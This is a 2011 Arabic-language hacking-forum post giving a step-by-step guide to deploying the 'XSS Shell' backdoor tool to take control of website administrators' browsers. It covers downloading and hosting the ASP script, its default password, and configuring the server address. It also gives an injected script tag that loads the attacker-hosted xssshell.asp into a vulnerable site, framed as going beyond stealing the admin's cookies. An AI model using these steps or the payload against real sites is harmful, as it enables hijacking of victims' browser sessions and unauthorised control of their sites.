التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-01-2011, 10:30 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي XSS backdoor and zombie manager Really hell


السلام عليكم ورحمه الله وبركاته

اليوم رح نبدا حركه حلوه ورائعه دعم ثغرات xss بسكربت للتحكم اون لاين بالهدف ...!!!

الفكره بالدرس
انك تلقى ثغره xss وتهاجم بمستوى اعلى من مجرد تحصل ع الكوكز الخاص بالادمن
ويكون هذا التحكم بعيد كل البعد عن الاكواد المعقده وهاد يكون بكل بساطه من خلال سكربت
xss shell





طريقه التنصيب
أول شيء تحميل الفايلات من هون
http://labs.portcullis.co.uk/downloa...xsstunnell.zip

بعدين ارفع الفولدر ع ايا استضافه تدعم لغه asp لانه شغلك رح يكون ع شركه asp
(ينفع استخدام السيرفر الشخصي اذا كان مركب عليه ip ثابت ) << ام التعقيد :P

Install Admin Interface

بعد نفك الضغط نرفع هاد ع فولدر بموقعك
xssshell
وهذا الفولدر
db
رابط السكربت يصير كالتالي
http://[vbspiders]/xssshell/
بطلب باسورد والباس الافتراضي هو
w00t

طيب هيك السكربت خلصنا تنصيبه بس لسا ضايل لنا خطوه ثانيه

Configure XSS Shell for communication

نفتح هذا الفايل
xssshell.asp
ندور ع كلمه
SERVER
نغير الي قدامها لرابط السكربت
يعني المكان الي رفعت عليه الفايلات هاي والخرابيط
"http://[YOURHOST]/xssshell/";
مثلا انا رفعته ع vbspiders
بصير هيك
"http://[vbspiders]/xssshell/";

وهيك انت تمام التمام
بكون جهزت الهجوم وكل اشي

طيب نستغل ثغره
xss
بزي كود التحويل او ايا كود بحيث انك تسحب المسكين ادمن الموقع للصفحه
وهذا احد الاكواد
< s c r i p t src="http://[vbspiders]/xssshell.asp"> < / s c r i p t >
مع ازاله المسافات بين كلمه سكربت


مش رح اشرح كل اشي زي الصغار المفروض مستوانا اعلى من هيك بس عشان التنصيب شويه فيه غلبه
شرحته
والباقي من خيارات السكربت اكتشفوها وهي بسيطه كثير


يديو تتوريال (ديمو )
http://www.securitytube.net/video/1098



المصدر
http://labs.portcullis.co.uk/application/xssshell/

مع خالص دعواتكم لي بالتوفيق بدراستي

شكر خاص لاخوكم ALQAYSAR



XSS backdoor and zombie manager Really hell

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:16 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0